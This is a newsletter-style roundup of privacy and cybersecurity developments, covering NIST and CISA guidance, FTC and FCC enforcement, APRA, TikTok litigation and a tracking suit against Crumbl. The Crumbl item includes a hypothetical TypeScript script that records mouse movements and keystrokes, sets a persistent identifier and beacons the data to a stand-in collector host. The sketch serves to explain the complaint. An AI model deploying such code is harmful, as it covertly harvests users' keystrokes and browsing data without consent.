Generative artificial intelligence (AI) has opened a new front in the battle to keep confidential information secure. The National Institute of Standards and Technology (NIST) recently released a draft report highlighting the risk generative AI poses to data security. The report, entitled “Artificial Intelligence Risk Management Framework: Generative Artificial Intelligence Profile,” details generative AI’s potential data security pitfalls and suggests actions for managing generative AI.

NIST identifies generative AI’s data security risk as “[l]eakage and unauthorized disclosure or de-anonymization of biometric, health, location, personally identifiable [information], or other sensitive data.” Training generative AI requires an enormous amount of data culled from the internet and other publicly available sources. For example, ChatGPT-4 was trained on 570 gigabytes of data drawn from books, web texts, articles, and other writing on the internet, which amounts to about 300 billion words in the model’s training database. Much of generative AI’s training data is personal, confidential, or sensitive information.

Generative AI systems have been known to disclose, upon request, information contained in their training data, including confidential information. During adversarial attacks, large language models have revealed private or sensitive information within their training data, including phone numbers, code, and conversations. The New York Times has sued ChatGPT’s creator, OpenAI, alleging in part that ChatGPT will furnish articles located behind the Times’ paywall. This disclosure risk poses obvious data security issues.

Less obvious are the data security issues posed by generative AI’s capacity for predictive inference. With the vast quantity of data available to generative AI, it can correctly infer personal or sensitive information, including a person’s race, location, gender, or political leanings, even if that information is not within the AI’s training data. NIST warns that these AI models, or individuals using the models, might disclose this inferred information, use it to undermine privacy, or apply it in a discriminatory manner. Already, we have seen a company settle an EEOC lawsuit alleging that it used AI to make discriminatory employment decisions. Generative AI threatens to increase this legal exposure.

From an AI governance perspective, NIST suggests several broad principles to mitigate the data privacy risk. Among other things, NIST recommends:

  • Aligning generative AI use with applicable laws, including those related to data privacy and the use, publication, or distribution of intellectual property;
  • Categorizing different types of generative AI content with associated data privacy risks;
  • Developing an incident response plan specifically tailored to address breaches, and regularly testing and updating that plan with feedback from external and third-party stakeholders;
  • Establishing incident response plans for third-party generative AI technologies deemed high-risk. As with all incident response plans, these plans should include:
    • Communicating third-party generative AI incident response plans to all relevant AI actors;
    • Defining ownership of the incident response functions;
    • Rehearsing (or “table topping”) the incident response plans regularly;
    • Regularly reviewing incident response plans for alignment with relevant breach reporting, data protection, data privacy, or other laws;
  • Updating and integrating due diligence processes for generative AI acquisition and procurement vendor assessments to include data privacy, security, and other risks; and
  • Conducting periodic audits and monitoring AI-generated content for privacy risks.

These actions will involve more than simply adding a reference to artificial intelligence to existing cybersecurity plans. They will involve carefully analyzing a company’s legal obligations, contractual obligations, and culture to design an AI governance plan that keeps confidential information out of the public domain and away from bad actors.

The Cybersecurity and Infrastructure Security Agency (CISA) and its partners recently issued helpful guidance for entities that have limited resources to address cyber threats. The guidance, entitled “Mitigating Cyber Threats with Limited Resources: Guidance for Civil Society,” is designed to help civil society organizations address cybersecurity risks with limited resources. The guidance defines civil society as “nonprofit, advocacy, cultural, faith-based, academic, think tanks, journalist, dissident, and diaspora organizations, communities, and individuals involved in defending human rights and advancing democracy.” These groups are considered “high risk communities” because they “are targeted by state-sponsored threat actors who seek to undermine democratic values and interests.”

According to the guidance, state-sponsored attacks against civil society are primarily launched by “the governments of Russia, China, Iran, and North Korea.” The threat actors are conducting “extensive pre-operational research to learn about potential victims, gather information to support social engineering, or obtain login credentials,” and are using spyware applications to collect data from victims.

The guidance is designed to provide “mitigation measures for civil society organizations to reduce their risk based on common cyber threats,” and civil society organizations and affiliated individuals are “strongly encourage[d]…to apply the mitigations provided in this joint guide.”

If you fall into the civil society organization category, you may wish to consider delving into the guidance with your IT professionals to learn more about the threat and how to mitigate the risk of a cyber-attack from state-sponsored actors and other threat actors.

The newest health care entity to be hit by a cyberattack is Ascension Health, which operates 140 hospitals and 40 assisted living facilities in 19 states. Ascension confirmed the cybersecurity attack and said it has disrupted its clinical operations. Ascension detected the attack on May 8, 2024, and is in the process of investigating and responding to it.

The attack has reportedly affected clinical operations in Florida, Indiana, Michigan, Oklahoma, Texas, and Wisconsin. Ascension recommends that its business partners contact its IT professionals to determine whether any connections to Ascension systems are at risk.

Unfortunately, threat actors continue to attack health care entities, and the pace does not appear to be abating. As a result, it is important for health care entities to prepare for an incident by implementing an incident response plan, testing that plan frequently, testing contingency operations and disaster recovery plans, and conducting tabletop exercises to prepare for attacks.

This week, the Massachusetts Supreme Judicial Court (SJC) reviewed a lower court’s dismissal of gun-related indictments against Richard Dilworth, Jr., related to the state’s refusal to disclose the bitmojis and usernames it used to conduct online surveillance through Snapchat accounts in 2017 and 2018.

Police arrested Dilworth for possession of a loaded revolver after Boston police saw eight Snapchat videos in which Dilworth appeared to be holding a gun. Dilworth was arrested a second time, again while in possession of a firearm, after police again saw him holding a gun on Snapchat.

During discovery, Dilworth sought the bitmojis and usernames to determine whether the police used Snapchat to target non-white individuals in violation of the Equal Protection Clause of the U.S. Constitution. The state claimed that the Snapchat surveillance targeted individuals suspected of criminal behavior based on tips received from informants.

The state argued that it could not comply with the discovery order because disclosure of the information would compromise informants and police officers, but the Suffolk Superior Court rejected that argument and granted Dilworth’s motion.

On appeal, during oral arguments, the SJC questioned the defendant’s attorney about how the bitmojis and usernames would strengthen the argument that the state had conducted selective prosecution. As further support, Dilworth’s attorney explained that the defense had conducted an informal survey of public defenders whose clients had been the subject of Snapchat surveillance; the survey showed that 17 out of 20 cases targeted Black individuals, and the other 3 were Hispanic individuals.

Dilworth’s attorney argued that the discretionary choices made by the officers in setting up the investigatory scheme (i.e., the use of Black bitmojis) went to the core claim that Dilworth was targeted because of his race. However, Justice Serge Georges, Jr., interjected that Dilworth was targeted because “he can’t stop flashing and posting videos of guns.” Justice Georges continued, “Mr. Dilworth was arrested after whatever was witnessed online, and no sooner does he hit the street, he does it again. So, it’s not this generalized kind of targeting that I see here. It’s a specific targeting.” The defendant’s counsel replied that the information the defense had developed raised questions about the true purpose of the surveillance.

We will await the SJC’s decision on the legality of this Snapchat surveillance and how that decision could affect other types of social media surveillance and profiling.

In the latest surge of lawsuits against retailers for embedding tracking technology into websites, yummy cookie company Crumbl was sued on May 1, 2024, for allegedly embedding web-tracking technology that allows third-party payment processing company Stripe to obtain, without consumer consent, customers’ names, email and delivery addresses, geographic locations, IP addresses, and payment information when consumers browse Crumbl’s website.

The complaint alleges that Stripe can then identify consumers “across devices, networks, and identities” and share that information with additional third parties. In addition, the tracking technology code remains in the consumers’ browsers after the consumer has made a purchase, which enables Stripe to capture additional data about the consumer when the consumer visits other websites.

The complaint alleges that “Stripe engages in the surreptitious interception and collection of sensitive information, including consumers’ mouse movements and clicks, keystrokes, IP address, geolocation, and financial information.” In addition, the complaint alleges that Stripe has shared this information with third parties without consumers’ consent.
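The kind of script the complaint describes is not exotic. As a rough, hypothetical sketch only (the collector URL, cookie name, and field names below are invented for illustration and are not Stripe’s or Crumbl’s actual code), an embedded third-party script can listen for page events, tag the browser with a persistent identifier, and send the captured data back to the third party’s servers:

```typescript
// Hypothetical illustration of embedded web-tracking technology.
// The endpoint, cookie name, and data fields are assumptions for this sketch.

type TrackingEvent = {
  kind: "mousemove" | "click" | "keystroke";
  detail: string;
  url: string;
  timestamp: number;
};

const COLLECTOR_URL = "https://collector.example.com/events"; // hypothetical endpoint
const buffer: TrackingEvent[] = [];

function record(kind: TrackingEvent["kind"], detail: string): void {
  buffer.push({ kind, detail, url: location.href, timestamp: Date.now() });
}

// Capture mouse movements, clicks, and keystrokes, as alleged in the complaint.
document.addEventListener("mousemove", (e) => record("mousemove", `${e.clientX},${e.clientY}`));
document.addEventListener("click", (e) => record("click", (e.target as HTMLElement)?.tagName ?? ""));
document.addEventListener("keydown", (e) => record("keystroke", e.key));

// A persistent cookie lets the script recognize the same browser on later visits,
// which is how tracking can continue after the consumer completes a purchase.
if (!document.cookie.includes("visitor_id=")) {
  document.cookie = `visitor_id=${crypto.randomUUID()}; max-age=31536000; path=/`;
}

// Periodically send buffered events to the third party's servers.
setInterval(() => {
  if (buffer.length === 0) return;
  navigator.sendBeacon(COLLECTOR_URL, JSON.stringify(buffer.splice(0)));
}, 5000);
```

Because the identifier persists in the browser, any other site embedding the same vendor’s script could recognize the consumer again, which is the cross-device, cross-site tracking the complaint describes.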

The complaint alleges that the conduct violates the California Invasion of Privacy Act, a criminal statute designed to address wiretaps. It will arguably be an uphill battle to prove that there is criminal intent when it comes to website tracking technology. The complaint further alleges that the conduct violates California’s Constitution.

The Federal Trade Commission (FTC) has assumed the authority to take enforcement action against unauthorized data disclosures under the Federal Trade Commission Act (FTC Act). During the past three weeks, the FTC has used this authority to go after health care companies that disclose their customers’ personal data without permission.

On April 11, the FTC sued Monument, an online addiction treatment company, for violating the FTC Act. Specifically, the FTC alleged that Monument: (1) failed to employ reasonable measures to prevent the disclosure of consumers’ health information via tracking technologies to third parties for advertising purposes; (2) failed to obtain its customers’ “affirmative express consent” before disclosing their health information to third parties; (3) misrepresented that it would not disclose its customers’ health information without their knowledge or consent; and (4) misrepresented that it was compliant with the Health Insurance Portability and Accountability Act (HIPAA). The same day the FTC filed the complaint, Monument entered into a stipulated order that bans it from disclosing health information for advertising purposes and requires it to obtain users’ affirmative consent before sharing health information with third parties for any purpose.

Cerebral, a telehealth firm, did not get off as easily. The FTC charged Cerebral with violating the FTC Act by disclosing its customers’ personal health information and other sensitive data to third parties for advertising purposes and failing to honor its easy-cancellation promises. On April 15, the FTC obtained an order restricting how Cerebral can use or disclose sensitive information and requiring it to provide customers with a simple way to cancel. The order also imposed a $5 million judgment and a $2 million civil penalty, with another $8 million penalty suspended premised upon the “truthfulness, accuracy, and completeness” of Cerebral’s sworn financial attestations going forward.

The FTC also sued BetterHelp, an online therapy firm, for violating the FTC Act. Like Monument and Cerebral, BetterHelp was charged with disclosing its customers’ personal information – including their email addresses, IP addresses, and health questionnaire information – to third parties for advertising purposes. The FTC also alleged that BetterHelp failed to maintain sufficient policies or procedures to protect its users’ health data or to limit how third parties could use that information. The FTC charged that this use violated BetterHelp’s own privacy policy. On May 6, the FTC issued a proposed order banning BetterHelp from sharing consumers’ health data for advertising purposes and requiring the company to pay restitution of $7.8 million to its customers.

The FTC has made its points clearly. Companies that obtain their users’ health information must implement appropriate policies and procedures to protect that information. If those companies disclose or sell that information to third parties for advertising or any other purpose, they must (1) advise their customers of that potential disclosure; (2) obtain the customers’ affirmative express consent; and (3) disclose that data only in accordance with their policies and the customers’ consent.

Congress is once again entertaining federal privacy legislation. The American Privacy Rights Act (APRA) was introduced by Senate Commerce Committee Chair Maria Cantwell (D-WA) and House Energy and Commerce Chair Cathy McMorris Rodgers (R-WA).

Unlike current laws, the APRA would apply to both commercial enterprises and nonprofit organizations, as well as common carriers regulated by the Federal Communications Commission (FCC). The law would have a broad scope but provide a conditional exemption for small businesses with less than $40 million in revenue and data on fewer than 200,000 consumers. However, this exemption would not apply if the small business transfers data to third parties for value. The APRA would require data minimization, i.e., prohibiting covered entities from collecting more personal information than is strictly necessary for the stated purpose.

The APRA defines sensitive data broadly as data related to government identifiers, health, biometrics, genetics, financial accounts and payments, precise geolocation, log-in credentials, private communications, revealed sexual behavior, calendar or address book data, phone logs, photos and recordings for private use, intimate imagery, video viewing activity, race, ethnicity, national origin, religion or sex, online activities over time and across third-party websites, information about a minor under the age of 17, and other data the FTC defines as sensitive covered data by regulation. Sensitive data would require affirmative express consent before transfer to third parties. Those meeting the definition of “covered entities” would need to give clear disclosures and easy opt-out options.

Notably, the APRA’s under-17 threshold for minors is a departure from the current federal standard set by the Children’s Online Privacy Protection Act (COPPA), which places the age cutoff at 13.

The APRA would require algorithmic bias impact assessments for “covered algorithms” that make consequential decisions. It would also prohibit discriminatory use of data. “Large data holders” and “covered high-impact social media companies” would face additional obligations around reporting, algorithm audits, and designated privacy/security officers.

While privacy professionals across the country will collectively groan at a law other than HIPAA using the term “covered entity,” the simplicity of a single standard rather than the current patchwork of state laws may just be worth the headache of two federal privacy laws using the same term with different definitions. However, it remains to be seen whether the APRA will make it to the floor of Congress. We’ve reported in the past about attempts at a federal standard that ended up stalling in committee.

You can read the full APRA draft here.

As threatened, TikTok, Inc. and ByteDance, Ltd., the owner of the TikTok app, filed suit against the United States on May 7, 2024, alleging that the Protecting Americans From Foreign Adversary Controlled Applications Act (“the Act”) is unconstitutional and violates the free speech rights of the 170 million Americans who use the app.

The 77-page petition, filed in the U.S. Court of Appeals for the D.C. Circuit, alleges that ByteDance is unable to divest TikTok and that divestiture “is simply not possible: not commercially, not technologically, not legally. And certainly not on the 270-day timeline required by the Act.”

The petitioners allege that divesting the U.S. TikTok platform is not commercially viable and would “dramatically undermine the value and viability of the U.S. TikTok business.” In addition, the petitioners allege that moving TikTok’s source code from ByteDance to a new owner would require that the code be moved to an alternative team of engineers, which would “take years.” They also allege that the Chinese government will not permit a divestment of the algorithms that are at the heart of TikTok, as “the Chinese government clearly signaled that it would assert its export control powers with respect to any attempt to sever TikTok’s operations from ByteDance.” That affirmation alone illustrates why the Act is so important for national security: the Chinese government will not allow the algorithms used on the TikTok platform, which are used to suggest content to users and are arguably manipulative, to be divested and, therefore, to fall outside its potential purview and control.

The petition alleges that the Act violates the First Amendment, constitutes an unconstitutional bill of attainder, violates Article I of the U.S. Constitution, and violates the Fifth Amendment’s Due Process and Takings Clauses. The relief requested includes a declaratory judgment that the Act violates the U.S. Constitution, an order enjoining the Attorney General from enforcing the Act, and a judgment in favor of petitioners.

For TikTok users, the law is applicable unless a court rules otherwise. Transitioning away from TikTok while the issue moves through litigation is one way to respond to the Act and the subsequent dispute. There are other social media platforms to use that are not deemed a national security threat by the federal government.

In response to the growing threat posed by pro-Russia hacktivists, on May 1, 2024, CISA and its agency partners issued an Alert to operators of industrial control systems and small-scale operational technology systems in North America and Europe on mitigation techniques to prevent a compromise of industrial control systems, including those in the “Water and Wastewater Systems, Dams, Energy, and Food and Agriculture Sectors.”

The Alert, entitled “Defending OT Operations Against Ongoing Pro-Russia Hacktivist Activity,” outlines the ongoing threat posed by pro-Russia hacktivists seeking remote control over industrial control systems, including successful attacks against several U.S.-based wastewater systems, which caused disruption in the systems, including “causing water pumps and blower equipment to exceed their normal operating parameters,…altered settings, turned off alarm mechanisms, and changed administrative passwords to lock out the WWS operators.”

The Alert provides mitigations to prevent and respond to the ongoing threat that industrial control operators may wish to review.

The Federal Communications Commission (FCC) has announced that it has levied almost $200 million in fines against “the nation’s largest wireless carriers for illegally sharing access to customers’ location information without consent and without taking reasonable measures to protect that information against unauthorized disclosure.”

The FCC’s allegations include that the carriers sold access to customers’ location information to aggregators, which then resold the data to third-party location-based service providers. The disclosures to the aggregators and the redisclosures to third parties occurred without customer consent. The FCC alleged that “customers’ real-time location information, revealing where they go and who they are, is some of the most sensitive data in carriers’ possession.”

The fines against the wireless carriers stem from violations of § 222 of the Communications Act, which requires carriers to “take reasonable measures to protect certain customer information, including location information,” as well as maintain the confidentiality of the data and obtain “affirmative, express customer consent before using, disclosing, or allowing access to such information.” The FCC maintains that these obligations apply when the carriers share customer information with third parties.

The FCC’s Privacy and Data Protection Task Force led the investigation, which started with customer complaints that a Missouri sheriff was using a location-finding service to track the location of individuals.